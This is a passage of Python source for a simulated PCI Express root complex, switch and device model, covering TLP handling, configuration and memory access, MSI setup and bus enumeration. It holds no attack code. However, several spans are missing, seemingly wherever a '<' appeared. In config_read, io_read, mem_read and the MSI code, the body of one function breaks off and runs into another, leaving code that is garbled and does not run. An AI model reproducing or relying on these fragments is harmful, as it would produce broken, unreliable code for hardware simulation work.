function.function_num = self.next_free_function_number()\n return self.add_function(function)\n\n def make_function(self):\n return self.append_function(self.default_function())\n\n def connect(self, port):\n self.upstream_port.connect(port)\n\n def upstream_recv(self, tlp):\n # logging\n print(\"[%s] Got downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n # config type 0\n\n if tlp.dest_id.device == self.device_num:\n # capture address information\n self.bus_num = tlp.dest_id.bus\n\n for f in self.functions:\n f.bus_num = self.bus_num\n\n # pass TLP to function\n for f in self.functions:\n if f.function_num == tlp.dest_id.function:\n yield from f.upstream_recv(tlp)\n return\n\n #raise Exception(\"Function not found\")\n print(\"Function not found\")\n else:\n print(\"Device number mismatch\")\n \n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completion\n\n if tlp.requester_id.bus == self.bus_num and tlp.requester_id.device == self.device_num:\n for f in self.functions:\n if f.function_num == tlp.requester_id.function:\n yield from f.upstream_recv(tlp)\n return\n\n print(\"Function not found\")\n else:\n print(\"Bus/device number mismatch\")\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n\n for f in self.functions:\n if f.match_bar(tlp.address, True):\n yield from f.upstream_recv(tlp)\n return\n\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n\n for f in self.functions:\n if f.match_bar(tlp.address):\n yield from f.upstream_recv(tlp)\n return\n\n print(\"Memory request did not match any BARs\")\n\n if tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64:\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n else:\n raise Exception(\"TODO\")\n\n def upstream_send(self, tlp):\n # logging\n print(\"[%s] Sending upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.upstream_port.send(tlp)\n\n def send(self, tlp):\n yield from self.upstream_send(tlp)\n\n\nclass Switch(object):\n \"\"\"Switch object, container for switch bridges and associated interconnect\"\"\"\n def __init__(self, *args, **kwargs):\n super(Switch, self).__init__(*args, **kwargs)\n self.upstream_bridge = SwitchUpstreamPort()\n\n self.default_switch_port = SwitchDownstreamPort\n\n self.min_dev = 1\n self.endpoints = []\n\n def next_free_device_number(self):\n self.endpoints.sort(key=lambda x: (x.device_num, x.function_num))\n d = self.min_dev\n if not self.endpoints:\n return d\n for ep in self.endpoints:\n if ep.device_num > d:\n return d\n d = ep.device_num + 1\n if d < 32:\n return d\n return None\n\n def append_endpoint(self, ep):\n ep.upstream_tx_handler = self.upstream_bridge.downstream_recv\n self.endpoints.append(ep)\n self.endpoints.sort(key=lambda x: (x.device_num, x.function_num))\n return ep\n\n def add_endpoint(self, ep):\n ep.bus_num = 0\n ep.device_num = self.next_free_device_number()\n ep.function_num = 0\n return self.append_endpoint(ep)\n\n def make_port(self):\n port = self.default_switch_port()\n self.upstream_bridge.downstream_port.connect(port.upstream_port)\n port.pri_bus_num = 0\n port.sec_bus_num = 0\n port.sub_bus_num = 0\n return self.add_endpoint(port)\n\n def connect(self, port):\n self.upstream_bridge.upstream_port.connect(port)\n\n\nclass TreeItem(object):\n def __init__(self):\n self.bus_num = 0\n self.device_num = 0\n self.function_num = 0\n\n self.vendor_id = 0\n self.device_id = 0\n\n self.desc = \"(Unknown)\"\n\n self.sec_bus_num = 0\n self.sub_bus_num = 0\n\n self.bar = [None]*6\n self.bar_size = [None]*6\n\n self.io_base = 0\n self.io_limit = 0\n self.mem_base = 0\n self.mem_limit = 0\n self.prefetchable_mem_base = 0\n self.prefetchable_mem_limit = 0\n\n self.capabilities = []\n self.ext_capabilities = []\n\n self.msi_addr = None\n self.msi_data = None\n\n self.children = []\n\n def find_dev(self, dev_id):\n if dev_id == self.get_id():\n return self\n for c in self.children:\n res = c.find_dev(dev_id)\n if res is not None:\n return res\n return None\n\n def get_capability_offset(self, cap_id):\n for c in self.capabilities:\n if c[0] == cap_id:\n return c[1]\n return None\n\n def to_str(self, prefix=''):\n s = ''\n\n if self.sub_bus_num > self.sec_bus_num:\n s += '[%02x-%02x]-' % (self.sec_bus_num, self.sub_bus_num)\n prefix += ' '*8\n else:\n s += '[%02x]-' % (self.sec_bus_num)\n prefix += ' '*5\n\n for i in range(len(self.children)):\n c = self.children[i]\n\n if i > 0:\n s += prefix\n\n if len(self.children) == 1:\n s += '-'\n elif len(self.children)-1 == i:\n s += '\\\\'\n else:\n s += '+'\n\n s += '-%02x.%x' % (c.device_num, c.function_num)\n\n if c.children:\n if i < len(self.children)-1:\n s += '-'+c.to_str(prefix+'|'+' '*6).strip()\n else:\n s += '-'+c.to_str(prefix+' '*7).strip()\n\n s += '\\n'\n\n return s\n\n def get_id(self):\n return PcieId(self.bus_num, self.device_num, self.function_num)\n\n def __bool__(self):\n return True\n\n def __getitem__(self, key):\n return self.children[key]\n\n def __iter__(self):\n return self.children.__iter__()\n \n def __len__(self):\n return len(self.children)\n\n\nclass RootComplex(Switch):\n def __init__(self, *args, **kwargs):\n super(RootComplex, self).__init__(*args, **kwargs)\n\n self.default_switch_port = RootPort\n\n self.min_dev = 1\n\n self.current_tag = 0\n\n self.downstream_tag_recv_queues = {}\n\n self.rx_cpl_queues = [[] for k in range(256)]\n self.rx_cpl_sync = [Signal(False) for k in range(256)]\n\n self.rx_tlp_handler = {}\n\n self.upstream_bridge = HostBridge()\n self.upstream_bridge.root = True\n self.upstream_bridge.upstream_tx_handler = self.downstream_recv\n\n self.tree = TreeItem()\n\n self.io_base = 0x80000000\n self.io_limit = self.io_base\n self.mem_base = 0x80000000\n self.mem_limit = self.mem_base\n self.prefetchable_mem_base = 0x8000000000000000\n self.prefetchable_mem_limit = self.prefetchable_mem_base\n\n self.upstream_bridge.io_base = self.io_base\n self.upstream_bridge.io_limit = self.io_limit\n self.upstream_bridge.mem_base = self.mem_base\n self.upstream_bridge.mem_limit = self.mem_limit\n self.upstream_bridge.prefetchable_mem_base = self.prefetchable_mem_base\n self.upstream_bridge.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n self.max_payload_size = 0\n self.max_read_request_size = 2\n self.read_completion_boundary = 128\n self.extended_tag_field_enable = True\n\n self.region_base = 0\n self.region_limit = self.region_base\n\n self.io_region_base = 0\n self.io_region_limit = self.io_region_base\n\n self.regions = []\n self.io_regions = []\n\n self.msi_addr = None\n self.msi_msg_limit = 0\n self.msi_signals = {}\n self.msi_callbacks = {}\n\n self.register_rx_tlp_handler(TLP_IO_READ, self.handle_io_read_tlp)\n self.register_rx_tlp_handler(TLP_IO_WRITE, self.handle_io_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ_64, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE, self.handle_mem_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE_64, self.handle_mem_write_tlp)\n\n def get_desc(self):\n #return \"%02x:%02x.%x %s\" % (self.bus_num, self.device_num, self.function_num, self.desc)\n return \"RootComplex\"\n\n def alloc_region(self, size, read=None, write=None):\n addr = 0\n mem = None\n\n addr = align(self.region_limit, 2**math.ceil(math.log(size, 2))-1)\n self.region_limit = addr+size-1\n if not read and not write:\n mem = mmap.mmap(-1, size)\n self.regions.append((addr, size, mem))\n else:\n self.regions.append((addr, size, read, write))\n\n return addr, mem\n\n def alloc_io_region(self, size, read=None, write=None):\n addr = 0\n mem = None\n\n addr = align(self.io_region_limit, 2**math.ceil(math.log(size, 2))-1)\n self.io_region_limit = addr+size-1\n if not read and not write:\n mem = mmap.mmap(-1, size)\n self.io_regions.append((addr, size, mem))\n else:\n self.io_regions.append((addr, size, read, write))\n\n return addr, mem\n\n def find_region(self, addr):\n for region in self.regions:\n if region[0] <= addr < region[0]+region[1]:\n return region\n return None\n\n def find_io_region(self, addr):\n for region in self.io_regions:\n if region[0] <= addr < region[0]+region[1]:\n return region\n return None\n\n def read_region(self, addr, length):\n region = self.find_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n return region[2][offset:offset+length]\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[2]):\n yield from region[2](offset, length)\n else:\n region[2](offset, length)\n\n def write_region(self, addr, data):\n region = self.find_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n region[2][offset:offset+len(data)] = data\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[3]):\n yield from region[3](offset, data)\n else:\n region[3](offset, data)\n\n def read_io_region(self, addr, length):\n region = self.find_io_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n return region[2][offset:offset+length]\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[2]):\n yield from region[2](offset, data)\n else:\n region[2](offset, data)\n\n def write_io_region(self, addr, data):\n region = self.find_io_region(addr)\n if not region:\n raise Exception(\"Invalid address\")\n offset = addr - region[0]\n if len(region) == 3:\n region[2][offset:offset+len(data)] = data\n elif len(region) == 4:\n if inspect.isgeneratorfunction(region[3]):\n yield from region[3](offset, data)\n else:\n region[3](offset, data)\n\n def downstream_send(self, tlp):\n # logging\n print(\"[%s] Sending TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.upstream_bridge.upstream_recv(tlp)\n\n def send(self, tlp):\n yield from self.downstream_send(tlp)\n\n def downstream_recv(self, tlp):\n # logging\n print(\"[%s] Got TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.handle_tlp(tlp)\n\n def handle_tlp(self, tlp):\n if (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n self.rx_cpl_queues[tlp.tag].append(tlp)\n self.rx_cpl_sync[tlp.tag].next = not self.rx_cpl_sync[tlp.tag]\n elif tlp.fmt_type in self.rx_tlp_handler:\n yield self.rx_tlp_handler[tlp.fmt_type](tlp)\n else:\n raise Exception(\"Unhandled TLP\")\n\n def register_rx_tlp_handler(self, fmt_type, func):\n self.rx_tlp_handler[fmt_type] = func\n\n def recv_cpl(self, tag, timeout=0):\n queue = self.rx_cpl_queues[tag]\n sync = self.rx_cpl_sync[tag]\n\n if timeout:\n yield sync, delay(timeout)\n else:\n yield sync\n\n if queue:\n return queue.pop(0)\n\n return None\n\n def get_free_tag(self):\n tag_count = 32\n\n for k in range(tag_count):\n self.current_tag = (self.current_tag + 1) % tag_count\n if not self.rx_cpl_queues[self.current_tag]:\n return self.current_tag\n\n return None\n\n def handle_io_read_tlp(self, tlp):\n if self.find_io_region(tlp.address):\n # logging\n print(\"[%s] IO read\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion_data(tlp, PcieId(0, 0, 0))\n\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform read\n data = bytearray(4)\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = yield from self.read_io_region(addr+start_offset, offset-start_offset)\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = yield from self.read_io_region(addr+start_offset, offset-start_offset)\n\n cpl.set_data(data)\n cpl.byte_count = 4\n cpl.length = 1\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_io_write_tlp(self, tlp):\n if self.find_io_region(tlp.address):\n # logging\n print(\"[%s] IO write\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion(tlp, PcieId(0, 0, 0))\n\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform write\n data = tlp.get_data()\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_io_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n yield from self.write_io_region(addr+start_offset, data[start_offset:offset])\n\n cpl.byte_count = 4\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_read_tlp(self, tlp):\n if self.find_region(tlp.address):\n # logging\n print(\"[%s] Memory read\" % (highlight(self.get_desc())))\n\n # perform operation\n addr = tlp.address\n offset = 0\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform read\n data = yield from self.read_region(addr, tlp.length*4)\n\n # prepare completion TLP(s)\n m = 0\n n = 0\n addr = tlp.address+tlp.get_first_be_offset()\n dw_length = tlp.length\n byte_length = tlp.get_be_byte_count()\n\n while m < dw_length:\n cpl = TLP()\n cpl.set_completion_data(tlp, PcieId(0, 0, 0))\n\n cpl_dw_length = dw_length - m\n cpl_byte_length = byte_length - n\n cpl.byte_count = cpl_byte_length\n if cpl_dw_length > 32 << self.max_payload_size:\n cpl_dw_length = 32 << self.max_payload_size # max payload size\n cpl_dw_length -= (addr & 0x7c) >> 2 # RCB align\n\n cpl.lower_address = addr & 0x7f\n\n cpl.set_data(data[m*4:(m+cpl_dw_length)*4])\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n m += cpl_dw_length;\n n += cpl_dw_length*4 - (addr&3)\n addr += cpl_dw_length*4 - (addr&3)\n\n else:\n # logging\n print(\"Memory request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_write_tlp(self, tlp):\n if self.find_region(tlp.address):\n # logging\n print(\"[%s] Memory write\" % (highlight(self.get_desc())))\n\n # perform operation\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform write\n data = tlp.get_data()\n\n # first dword\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if tlp.length > 2:\n # middle dwords\n if start_offset is None:\n start_offset = offset\n offset += (tlp.length-2)*4\n\n if tlp.length > 1:\n # last dword\n mask = tlp.last_be\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n\n # memory writes are posted, so don't send a completion\n\n else:\n # logging\n print(\"Memory request did not match any regions\")\n\n def config_read(self, dev, addr, length, timeout=0):\n n = 0\n data = b''\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_CFG_READ_1\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n tlp.dest_id = dev\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n tlp.register_number = addr >> 2\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl or cpl.status != CPL_STATUS_SC:\n d = b'\\xff\\xff\\xff\\xff'\n else:\n assert cpl.length == 1\n d = struct.pack('> 2\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n n += byte_length\n addr += byte_length\n\n def config_write_words(self, dev, addr, data, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.config_write(dev, addr, data, timeout)\n\n def config_write_dwords(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, data, 4, timeout)\n\n def config_write_qwords(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, data, 8, timeout)\n\n def config_write_byte(self, dev, addr, data, timeout=0):\n yield from self.config_write(dev, addr, [data], timeout)\n\n def config_write_word(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, [data], timeout=timeout)\n\n def config_write_dword(self, dev, addr, data, timeout=0):\n yield from self.config_write_dwords(dev, addr, [data], timeout=timeout)\n\n def config_write_qword(self, dev, addr, data, timeout=0):\n yield from self.config_write_qwords(dev, addr, [data], timeout=timeout)\n\n def capability_read(self, dev, cap_id, addr, length, timeout=0):\n ti = self.tree.find_dev(dev)\n\n if not ti:\n raise Exception(\"Device not found\")\n\n offset = ti.get_capability_offset(cap_id)\n\n if not offset:\n raise Exception(\"Capability not found\")\n\n val = yield from self.config_read(dev, addr+offset, length, timeout)\n return val\n\n def capability_read_words(self, dev, cap_id, addr, count, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n data = yield from self.capability_read(dev, cap_id, addr, count*ws, timeout)\n words = []\n for k in range(count):\n words.append(int.from_bytes(data[ws*k:ws*(k+1)], 'little'))\n return words\n\n def capability_read_dwords(self, dev, cap_id, addr, count, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, count, 4, timeout)\n return data\n\n def capability_read_qwords(self, dev, cap_id, addr, count, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, count, 8, timeout)\n return data\n\n def capability_read_byte(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read(dev, cap_id, addr, 1, timeout)\n return data[0]\n\n def capability_read_word(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_read_dword(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_dwords(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_read_qword(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_qwords(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_write(self, dev, cap_id, addr, data, timeout=0):\n ti = self.tree.find_dev(dev)\n\n if not ti:\n raise Exception(\"Device not found\")\n\n offset = ti.get_capability_offset(cap_id)\n\n if not offset:\n raise Exception(\"Capability not found\")\n\n yield from self.config_write(dev, addr+offset, data, timeout)\n\n def capability_write_words(self, dev, cap_id, addr, data, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.capability_write(dev, cap_id, addr, data, timeout)\n\n def capability_write_dwords(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, data, 4, timeout)\n\n def capability_write_qwords(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, data, 8, timeout)\n\n def capability_write_byte(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write(dev, cap_id, addr, [data], timeout)\n\n def capability_write_word(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, [data], timeout=timeout)\n\n def capability_write_dword(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_dwords(dev, cap_id, addr, [data], timeout=timeout)\n\n def capability_write_qword(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_qwords(dev, cap_id, addr, [data], timeout=timeout)\n\n def io_read(self, addr, length, timeout=0):\n n = 0\n data = b''\n\n if self.find_region(addr):\n val = yield from self.read_io_region(addr, length)\n return val\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_IO_READ\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.length == 1\n d = struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_READ_64\n else:\n tlp.fmt_type = TLP_MEM_READ\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = length-n\n byte_length = min(byte_length, (128 << self.max_read_request_size)-first_pad) # max read request size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n\n m = 0\n\n while m < byte_length:\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.byte_count+3+(cpl.lower_address&3) >= cpl.length*4\n assert cpl.byte_count == byte_length - m\n\n d = bytearray()\n\n for k in range(cpl.length):\n d.extend(struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_WRITE_64\n else:\n tlp.fmt_type = TLP_MEM_WRITE\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = len(data)-n\n byte_length = min(byte_length, (128 << self.max_payload_size)-first_pad) # max payload size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be_data(addr, data[n:n+byte_length])\n\n yield from self.send(tlp)\n\n n += byte_length\n addr += byte_length\n\n def mem_write_words(self, addr, data, ws=2, timeout=0, attr=0, tc=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.mem_write(addr, data, timeout, attr, tc)\n\n def mem_write_dwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 4, timeout, attr, tc)\n\n def mem_write_qwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 8, timeout, attr, tc)\n\n def mem_write_byte(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write(addr, [data], timeout, attr, tc)\n\n def mem_write_word(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_dword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_dwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_qword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_qwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def msi_region_read(self, addr, length):\n return b'\\x00'*length\n\n def msi_region_write(self, addr, data):\n assert addr == 0\n assert len(data) == 4\n number = struct.unpack('> 23 & 1\n msi_mmcap = msg_ctrl >> 17 & 7\n\n # message address\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 4, self.msi_addr & 0xfffffffc)\n\n if msi_64bit:\n # 64 bit message address\n # message upper address\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 8, (self.msi_addr >> 32) & 0xffffffff)\n # message data\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 12, self.msi_msg_limit)\n\n else:\n # 32 bit message address\n # message data\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 8, self.msi_msg_limit)\n\n # enable and set enabled messages\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 0, (msg_ctrl & ~(7 << 20)) | 1 << 16 | msi_mmcap << 20)\n\n ti.msi_addr = self.msi_addr\n ti.msi_data = self.msi_msg_limit\n\n for k in range(32):\n self.msi_signals[self.msi_msg_limit] = [Signal(bool(0))]\n self.msi_callbacks[self.msi_msg_limit] = []\n self.msi_msg_limit += 1\n\n return True\n\n def msi_get_signal(self, dev, number=0):\n if not self.tree:\n return None\n ti = self.tree.find_dev(dev)\n if not ti:\n return None\n if ti.msi_data is None:\n return None\n if ti.msi_data+number not in self.msi_signals:\n return None\n return self.msi_signals[ti.msi_data+number][0]\n\n def msi_register_signal(self, dev, sig, number=0):\n if not self.tree:\n return\n ti = self.tree.find_dev(dev)\n if not ti:\n return\n if ti.msi_data is None:\n return\n if ti.msi_data+number not in self.msi_signals:\n return\n self.msi_signals[ti.msi_data+number].append(sig)\n\n def msi_register_callback(self, dev, callback, number=0):\n if not self.tree:\n return\n ti = self.tree.find_dev(dev)\n if not ti:\n return\n if ti.msi_data is None:\n return\n if ti.msi_data+number not in self.msi_callbacks:\n return\n self.msi_callbacks[ti.msi_data+number].append(callback)\n\n def enumerate_segment(self, tree, bus, timeout=1000, enable_bus_mastering=False, configure_msi=False):\n sec_bus = bus+1\n sub_bus = bus\n\n tree.sec_bus_num = bus\n\n # align limits against bridge registers\n self.io_limit = align(self.io_limit, 0xfff)\n self.mem_limit = align(self.mem_limit, 0xfffff)\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, 0xfffff)\n\n tree.io_base = self.io_limit\n tree.io_limit = self.io_limit\n tree.mem_base = self.mem_limit\n tree.mem_limit = self.mem_limit\n tree.prefetchable_mem_base = self.prefetchable_mem_limit\n tree.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n # logging\n print(\"[%s] Enumerating bus %d\" % (highlight(self.get_desc()), bus))\n\n for d in range(32):\n if bus == 0 and d == 0:\n continue\n\n # read vendor ID and device ID\n val = yield from self.config_read_dword(PcieId(bus, d, 0), 0x000, timeout)\n\n if val is None or val == 0xffffffff:\n continue\n\n # valid vendor ID\n # logging\n print(\"[%s] Found device at %02x:%02x.%x\" % (highlight(self.get_desc()), bus, d, 0))\n\n fc = 1\n\n # read type\n val = yield from self.config_read_byte(PcieId(bus, d, 0), 0x00e, timeout)\n\n if val & 0x80:\n # multifunction device\n fc = 8\n\n for f in range(fc):\n # read vendor ID and device ID\n val = yield from self.config_read(PcieId(bus, d, f), 0x000, 4, timeout)\n\n if val is None or val == b'\\xff\\xff\\xff\\xff':\n continue\n\n ti = TreeItem()\n tree.children.append(ti)\n ti.bus_num = bus\n ti.device_num = d\n ti.function_num = f\n ti.vendor_id, ti.device_id = struct.unpack('= bar_cnt-1:\n raise Exception(\"Invalid BAR configuration\")\n\n # read adjacent BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+(bar+1)*4, 0xffffffff)\n val2 = yield from self.config_read_dword(PcieId(bus, d, f), 0x010+(bar+1)*4)\n val |= val2 << 32\n mask = (~val & 0xffffffffffffffff) | 15\n size = mask + 1\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d raw: %016x, mask: %016x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, mask, size))\n\n if val & 8:\n # prefetchable\n # align and allocate\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, mask)\n val = val & 15 | self.prefetchable_mem_limit\n self.prefetchable_mem_limit += size\n\n else:\n # not-prefetchable\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d marked non-prefetchable, allocating from 32-bit non-prefetchable address space\" % (highlight(self.get_desc()), bus, d, f, bar))\n # align and allocate\n self.mem_limit = align(self.mem_limit, mask)\n val = val & 15 | self.mem_limit\n self.mem_limit += size\n\n ti.bar[bar] = val\n ti.bar_size[bar] = size\n\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d Allocation: %016x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, size))\n\n # write BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+bar*4, val & 0xffffffff)\n yield from self.config_write_dword(PcieId(bus, d, f), 